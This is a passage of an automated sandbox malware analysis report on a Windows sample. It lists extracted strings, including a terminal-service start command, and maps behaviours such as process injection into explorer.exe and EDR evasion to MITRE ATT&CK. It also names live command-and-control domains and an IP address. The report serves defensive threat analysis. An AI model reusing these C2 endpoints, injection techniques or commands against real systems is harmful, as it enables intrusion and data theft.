0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
                    Source: cnfpnteryde.1.drString found in binary or memory: net start termservice
                    Source: cnfpnteryde.1.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
                    Source: vkqcbyjdfiw.12.drString found in binary or memory: net start termservice
                    Source: vkqcbyjdfiw.12.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		511
                    Process Injection                    		11
                    Masquerading                    		OS Credential Dumping2
                    System Time Discovery                    		1
                    Remote Desktop Protocol                    		1
                    Screen Capture                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		11
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		21
                    Virtualization/Sandbox Evasion                    		LSASS Memory1
                    Query Registry                    		Remote Desktop Protocol1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Abuse Elevation Control Mechanism                    		511
                    Process Injection                    		Security Account Manager221
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		NTDS1
                    Process Discovery                    		Distributed Component Object ModelInput Capture2
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Abuse Elevation Control Mechanism                    		LSA Secrets21
                    Virtualization/Sandbox Evasion                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    Account Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    DLL Side-Loading                    		DCSync1
                    System Owner/User Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    File and Directory Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow235
                    System Information Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542426 Sample: 5Z1WFRMTOXRH6X21Z8NU8.exe Startdate: 25/10/2024 Architecture: WINDOWS Score: 100 35 artvisions-autoinsider.com 2->35 37 artvisions-autoinsider3.com 2->37 39 artvisions-autoinsider2.com 2->39 53 Suricata IDS alerts for network traffic 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 4 other signatures 2->59 8 5Z1WFRMTOXRH6X21Z8NU8.exe 2 2->8         started        11 logioptionsplus_updater.exe 2 2->11         started        13 logioptionsplus_updater.exe 1 2->13         started        signatures3 process4 signatures5 69 Maps a DLL or memory area into another process 8->69 71 Tries to detect virtualization through RDTSC time measurements 8->71 73 Switches to a custom stack to bypass stack traces 8->73 15 more.com 3 8->15         started        75 Found direct / indirect Syscall (likely to bypass EDR) 11->75 19 more.com 2 11->19         started        process6 file7 31 C:\Users\user\AppData\Local\...\cnfpnteryde, PE32 15->31 dropped 43 Contains functionality to start a terminal service 15->43 45 Injects code into the Windows Explorer (explorer.exe) 15->45 47 Writes to foreign memory regions 15->47 51 2 other signatures 15->51 21 explorer.exe 12 15->21         started        25 conhost.exe 15->25         started        33 C:\Users\user\AppData\Local\...\vkqcbyjdfiw, PE32 19->33 dropped 49 Maps a DLL or memory area into another process 19->49 27 explorer.exe 19->27         started        29 conhost.exe 19->29         started        signatures8 process9 dnsIp10 41 artvisions-autoinsider.com 188.114.97.3, 49838, 80 CLOUDFLARENETUS European Union 21->41 61 System process connects to network (likely due to code injection or exploit) 21->61 63 Contains functionality to start a terminal service 21->63 65 Contains functionality to inject code into remote processes 21->65 67 Switches to a custom stack to bypass stack traces 21->67 signatures11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    5Z1WFRMTOXRH6X21Z8NU8.exe18%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\cnfpnteryde100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw100%Joe Sandbox ML

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.symauth.com/cps0(0%URL Reputationsafe
                    http://www.symauth.com/rpa000%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    artvisions-autoinsider.com
                    		188.114.97.3
                    		truetrue
                      		unknown
                      artvisions-autoinsider3.com
                      		unknown
                      		unknownfalse
                        		unknown
                        artvisions-autoinsider2.com
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://artvisions-autoinsider.com/8bkjdSdfjCe/index.phptrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.aiim.org/pdfa/ns/property#5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.pdfshaper.com/buy.htmlopenU5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                		unknown
                                http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.phpduexplorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.vmware.com/05Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.aiim.org/pdfa/ns/id/&4Dlogioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://artvisions-autoinsider3.com/G8bjesde2/index.phpexplorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.aiim.org/pdfa/ns/id/logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.pdfshaper.com/update.verU5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                            		unknown
                                            http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php0explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://www.aiim.org/pdfa/ns/schema#5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.aiim.org/pdfa/ns/property#HRlogioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://artvisions-autoinsider3.com/G8bjesde2/index.phpPexplorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ca.signfiles.com/TSAServer.aspx5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                                      		unknown
                                                      http://www.vmware.com/0/5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.pdfshaper.comopen5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                                          		unknown
                                                          http://artvisions-autoinsider3.com/Sexplorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://artvisions-autoinsider.com/8bkjdSdfjCe/index.phpQexplorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.symauth.com/cps0(5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.phpexplorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://artvisions-autoinsider.com/8bkjdSdfjCe/index.phpHexplorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.xfa.org/schema/xfa-template/5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                                                    		unknown
                                                                    http://artvisions-autoinsider.com/8bkjdSdfjCe/index.php&explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.winsoft.sk5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                                                        		unknown
                                                                        http://xml.org/sax/properties/declaration-handler5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                                                          		unknown
                                                                          http://www.winsoft.skU5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                                                            		unknown
                                                                            http://www.symauth.com/rpa005Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.phpMexplorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.pdfshaper.comP5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                                                                		unknown
                                                                                http://www.info-zip.org/5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.00000000045BC000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.000000000517D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://artvisions-autoinsider3.com/explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.aiim.org/pdfa/ns/extension/5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.aiim.org/pdfa/ns/id/ndows.5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://artvisions-autoinsider3.com/G8bjesde2/index.php(explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://artvisions-autoinsider2.com/cexplorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://artvisions-autoinsider.com/5explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://www.pdfshaper.com/download.htmlopen5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                                                                                		unknown
                                                                                                http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php?explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.xfa.org/schema/xfa-data/1.0/5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                                                                                    		unknown
                                                                                                    http://xml.org/sax/properties/lexical-handler5Z1WFRMTOXRH6X21Z8NU8.exefalse
                                                                                                      		unknown

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      188.114.97.3
                                                                                                      		artvisions-autoinsider.comEuropean Union
                                                                                                      		13335CLOUDFLARENETUStrue

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1542426
                                                                                                      Start date and time:2024-10-25 22:41:28 +02:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 7m 36s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
